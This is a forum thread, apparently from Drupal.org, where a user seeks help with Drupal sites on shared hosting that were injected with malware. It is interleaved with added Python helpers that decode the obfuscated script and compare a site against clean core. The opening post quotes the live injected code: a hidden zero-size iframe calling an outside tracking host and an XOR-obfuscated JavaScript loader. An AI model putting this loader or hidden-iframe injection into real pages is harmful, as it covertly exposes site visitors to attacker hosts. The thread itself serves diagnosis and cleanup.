Hi,
I'm working on upgrading a Drupal site for a friend that's being hosted on a shared Bluehost (eek) server. I recently checked the site and some nasty-looking iFrames have been injected at the very top of the page.
The iFrames aren't rendering anything, but it's very worrying nonetheless.
I've tried googling it - which led to this:
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spywa...
which appears to describe the exact exploit I'm seeing on the site, but doesn't yet provide any fix.
The exploited site is here (WARNING - VISIT AT YOUR OWN RISK): http://dayalssports[.]com/
Perhaps safer to just view the source: view-source:http://dayalssports.com/
The article above suggests that infected WordPress sites will cause the user's browser to potentially try to install some malware for advertising etc., except this site is Drupal of course - but not sure if that makes any difference.
Here's a sample of the injected iFrames:
<iframe width="0" height="0" src="http://kfc.i.illuminationes.com/snitch?default_keyword=Dayals%20Sports&referrer=&se_referrer=&source=dayalssports.com"><html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;"></pre></body></html></iframe>
and the injected javascript:
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;
'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;t
cp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02f
mawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1
F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02
'00q,a'00'02)'
02'00mo'00'02)'02'00 qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'0
0'02)'02fgdcw
nv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02
'00gd'00'02)'
02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02j
mqv'1@'2C'2;f mawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++) {b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
and it's making a whole bunch of network requests on each page load, e.g.:
GET /snitch?default_keyword=Dayals%20Sports&referrer=&se_referrer=&source=dayalssports.com HTTP/1.1
Host: kfc.i.illuminationes.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Referer: http://dayalssports[.]com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: bss=KC0g_y0LqDH8V81QT_JAAdnvuFVJ
My first priority is of course figuring out how this has happened and removing the exploit, and then patching whatever it is that has let this happen. But I've very little experience dealing with this kind of issue, so I'm looking for any advice that's out there!
Some further information:
There are some other Drupal sites on the same server that are also affected, but in a different way. The front ends are not affected, but instead when loading up any administration pages, e.g. /admin/structure/block, it's also making requests out to the same http://kfc.i.illuminationes[.]com/snitch URL, which severely stalls the page load time. This includes an almost completely fresh install of Drupal - which is even more worrying.
Any help or advice much appreciated.
Thanks.
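The injected script shown above is a simple obfuscation: the payload is the JavaScript escape() form of the markup with every character XOR-ed with a small key, and the loop undoes that and hands the result to document.write. The following is an added triage helper, not code from the post or from Drupal: it finds that decoder pattern in a page, recovers the blob variable and key, decodes the payload and lists the hostnames the decoded markup would contact, so the result can go straight into log searches and blocklists. The sample page, blob and hostname (bad.example) are constructed for the demo; they are not the blob from the post.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample (not the blob from the post): a benign iframe tag
# obfuscated the same way the injected script on the page is, i.e. the
# JavaScript escape() form of the markup with every character XOR-ed with 2.
SAMPLE_BLOB = ("'1Akdpcog'02ukfvj'1F'002'00'02qpa'1F'00jvvr'1C--"
               "`cf,gzcorng-qlkvaj'00'1G'1A-kdpcog'1G")

# Constructed page fragment wrapping the blob in the same decoder loop the
# post shows (var a="...", XOR 2 per char, unescape, document.write).
SAMPLE_PAGE = (
    '<html><body><script type="text/javascript">var a="' + SAMPLE_BLOB +
    '";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++) '
    '{b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);'
    'document.write(c);</script><p>site content</p></body></html>'
)

# Matches the decoder loop and captures the blob variable name and XOR key.
DECODER_RE = re.compile(
    r'String\.fromCharCode\(\s*(\w+)\.charCodeAt\(\s*\w+\s*\)\s*\^\s*(\d+)\s*\)')
# Matches src="..." attributes in the decoded markup to pull out hostnames.
SRC_RE = re.compile(r'''src\s*=\s*["']?(https?://[^"'\s>]+)''', re.I)


def decode_xor_escape(blob: str, key: int) -> str:
    """Undo the obfuscation: XOR every character with the key, then decode
    the %XX sequences (urllib's unquote covers the JS unescape() cases here)."""
    xored = "".join(chr(ord(ch) ^ key) for ch in blob)
    return unquote(xored)


def find_obfuscated_scripts(html: str) -> list:
    """Return one (key, decoded_text) tuple per XOR/unescape decoder found."""
    results = []
    for m in DECODER_RE.finditer(html):
        var_name, key = m.group(1), int(m.group(2))
        # Locate the string literal assigned to the variable the loop reads.
        assign = re.search(
            r'var\s+' + re.escape(var_name) + r'\s*=\s*"((?:[^"\\]|\\.)*)"', html)
        if not assign:
            continue
        # Forum/paste line-wrapping inserts whitespace into the blob; a real
        # blob encodes spaces as '02, so stripping literal whitespace is safe.
        blob = re.sub(r'\s+', '', assign.group(1))
        results.append((key, decode_xor_escape(blob, key)))
    return results


def extract_hosts(decoded: str) -> list:
    """Hostnames referenced by src= in decoded markup (for blocklists, log searches)."""
    hosts = []
    for url in SRC_RE.findall(decoded):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def triage(html: str) -> dict:
    """Summarise what the injected decoder(s) in a page would write into it."""
    found = find_obfuscated_scripts(html)
    return {
        "decoders": len(found),
        "keys": [key for key, _ in found],
        "decoded": [text for _, text in found],
        "hosts": sorted({h for _, text in found for h in extract_hosts(text)}),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_PAGE)
    for text in report["decoded"]:
        print("decoded:", text)
    print("contacted hosts:", report["hosts"])
```

To use it on the real site, save the page source (view-source, not a normal visit) to a file and pass its contents to triage(); the hostnames it returns are what to look for in the server's outbound connection logs and in the other sites' admin page loads mentioned in the post.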

Comments
Regarding to your description
Regarding your description and after a quick search, I'd have a look at your friend's computer and yours first to see if you're not infected and after that, clean your server. Look on this page https://wordpress.org/support/topic/js-injection-after-wp as people seem to have the same problem as you.
Julien Didelet
Founder
Weblaa.com
I would like to suggest a
I would like to suggest a Drupal cleanup procedure as below:
1. drupal_dirty/ and database, and save to somewhere else safe
2. drupal_clean/
3. rsync -av drupal_clean/ drupal_dirty
4. cd drupal_clean; git init; git add --all .; git commit -am 'Initialize with clean Drupal core' for this clean Drupal core
5. rsync -av drupal_dirty/ drupal_clean
6. cd drupal_clean; git status and keep checking those changed files, and git add those safe files
7. git status and git add until you are able to figure out which files were injected by the hacker
Moreover, if you can update the host OS packages to the latest stable version, just do so, too.
Edison Wong
CEO, Co-founder
PantaRei Design Limited
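The core of the procedure above is a comparison against a known-clean Drupal core: everything that is modified, added or missing relative to the pristine tree is a candidate for injected code and must be explained before the site is trusted again. The following is an added example, not code from the comment or from Drupal, that performs that comparison in Python with SHA-256 digests instead of rsync and git, so it runs on a host without either. The two directory trees and their file contents are a constructed fixture; the real comparison would be run against a freshly downloaded core of the same version and the affected docroot.

```python
import hashlib
import os
import tempfile

# Constructed fixture: a tiny "clean" Drupal-like tree and a "dirty" copy in
# which one file has an iframe appended, one file is gone and one unexpected
# file has appeared. Paths are illustrative, not Drupal's real file list.
CLEAN_FILES = {
    "index.php": "<?php\nrequire_once 'includes/bootstrap.inc';\n",
    "includes/bootstrap.inc": "<?php\n// bootstrap\n",
    "robots.txt": "User-agent: *\n",
}
DIRTY_FILES = dict(CLEAN_FILES)
DIRTY_FILES["index.php"] += (
    '<iframe width="0" height="0" src="http://bad.example/snitch"></iframe>\n')
DIRTY_FILES["sites/default/files/.cache.php"] = "<?php // not part of core\n"
del DIRTY_FILES["robots.txt"]


def write_tree(root: str, files: dict) -> None:
    """Materialise a {relative_path: content} mapping under root."""
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def hash_tree(root: str) -> dict:
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_trees(clean_root: str, dirty_root: str) -> dict:
    """Classify the dirty tree against the clean one, like git status would
    after overlaying drupal_dirty/ onto a committed clean core."""
    clean, dirty = hash_tree(clean_root), hash_tree(dirty_root)
    return {
        "modified": sorted(p for p in clean if p in dirty and clean[p] != dirty[p]),
        "added": sorted(p for p in dirty if p not in clean),
        "missing": sorted(p for p in clean if p not in dirty),
        "unchanged": sorted(p for p in clean if p in dirty and clean[p] == dirty[p]),
    }


def run_fixture() -> dict:
    """Build the constructed trees in a temp dir and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean_root = os.path.join(tmp, "drupal_clean")
        dirty_root = os.path.join(tmp, "drupal_dirty")
        write_tree(clean_root, CLEAN_FILES)
        write_tree(dirty_root, DIRTY_FILES)
        return compare_trees(clean_root, dirty_root)


if __name__ == "__main__":
    for category, paths in run_fixture().items():
        print(f"{category}:")
        for p in paths:
            print("   ", p)
```

Files under sites/ (settings.php, uploaded files, contrib modules and themes) will always show up as "added" because they are not part of core; the point is that every one of them has to be accounted for, and anything executable in an uploads directory deserves a close look before being kept.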
Thanks for the
Thanks for the suggestions!
I've done full updates of core and modules and that seemed to have made the injected code go away, but will keep searching for the initial vulnerability.
Cheers.
Good news that update core
Good news that updating core and modules solved the problem ;-)
BTW, strongly recommend using Git to housekeep your source code, so you are always able to compare and roll back whenever required :-)
Edison Wong
CEO, Co-founder
PantaRei Design Limited
Yes indeed, need to get into
Yes indeed, need to get into the git habit!